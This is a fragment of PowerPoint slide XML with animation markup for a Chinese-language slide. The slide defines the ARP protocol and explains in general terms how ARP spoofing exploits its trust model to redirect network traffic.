          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:alpha val="90000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                  <a:alpha val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="80000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3592956" y="2959978"/>
            <a:ext cx="1513840" cy="579120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Part 03</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="直接连接符 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778443" y="3499305"/>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9"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out)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>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10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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="35" presetClass="path" presetSubtype="0" decel="40000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.02761 -1.48148E-6 L 0.20768 -1.48148E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="11758" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="16" presetID="35" presetClass="path" presetSubtype="0" accel="40000" decel="40000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.028 -1.48148E-6 L 2.91667E-6 -1.48148E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="1393" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetID="31" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="90"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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3" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="14" grpId="1" bldLvl="0" animBg="1"/>
      <p:bldP spid="14" grpId="2" bldLvl="0" animBg="1"/>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3137133" y="429460"/>
            <a:ext cx="417211" cy="1495661"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1"/>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
              </a:path>
              <a:tileRect/>
            </a:gradFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="127000" dist="63500" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="27000"/>
              </a:prstClr>
            </a:outerShd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111648" y="2216230"/>
            <a:ext cx="417211" cy="1495661"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1"/>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
              </a:path>
              <a:tileRect/>
            </a:gradFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="127000" dist="63500" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="27000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>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3001878" y="3833060"/>
            <a:ext cx="417211" cy="1495661"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1"/>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
              </a:path>
              <a:tileRect/>
            </a:gradFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="127000" dist="63500" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="27000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="椭圆 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1397996" y="546496"/>
            <a:ext cx="1259763" cy="1259763"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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kumimoji="1" lang="en-US" altLang="zh-CN" sz="6600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="椭圆 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8744946" y="2216068"/>
            <a:ext cx="1259763" cy="1259763"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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kumimoji="1" lang="en-US" altLang="zh-CN" sz="6600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="椭圆 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1605641" y="3711889"/>
            <a:ext cx="1259763" cy="1259763"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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kumimoji="1" lang="en-US" altLang="zh-CN" sz="6600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="组合 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3635375" y="581660"/>
            <a:ext cx="7048500" cy="1224942"/>
            <a:chOff x="6843957" y="4188086"/>
            <a:chExt cx="6232656" cy="982153"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="矩形 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843957" y="4525668"/>
              <a:ext cx="6232656" cy="644571"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>地址解析协议，即ARP（Address Resolution Protocol），是根据IP地址获取MAC地址的一个TCP/IP协议。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="矩形 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843958" y="4188086"/>
              <a:ext cx="626110" cy="293265"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ARP</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="组合 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1605915" y="1576070"/>
            <a:ext cx="6505575" cy="1900045"/>
            <a:chOff x="6843957" y="4188086"/>
            <a:chExt cx="6232656" cy="866903"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="矩形 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843957" y="4525668"/>
              <a:ext cx="6232656" cy="529321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>地址解析协议是建立在网络中各个主机相互信任的基础上的，网络上的主机可以自主发送ARP应答消息，其他主机收到应答报文时不会检测该报文的真实性就会将其记入ARP缓存。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="矩形 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11934111" y="4188086"/>
              <a:ext cx="1142502" cy="269237"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3554095" y="3711575"/>
            <a:ext cx="7574915" cy="2566460"/>
            <a:chOff x="6843957" y="4188086"/>
            <a:chExt cx="6232656" cy="2566251"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="矩形 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843957" y="4525668"/>
              <a:ext cx="6232656" cy="2228669"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ARP请求为广播形式发送的，网络上的主机可以自主发送ARP应答消息，并且当其他主机收到应答报文时不会检测该报文的真实性就将其记录在本地的MAC地址转换表，这样攻击者就可以向目标主机发送伪ARP应答报文，从而篡改本地的MAC地址表。ARP欺骗可以导致目标计算机与网关通信失败，更会导致通信重定向，所有的数据都会通过攻击者的机器，因此存在极大的安全隐患。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="矩形 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843958" y="4188086"/>
              <a:ext cx="1083310" cy="365730"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ARP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>欺骗</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="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p14:dur="9"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750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(outHorizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>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63" presetClass="path" presetSubtype="0" decel="50000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.02774 1.11111E-6 L 0.1108 1.11111E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
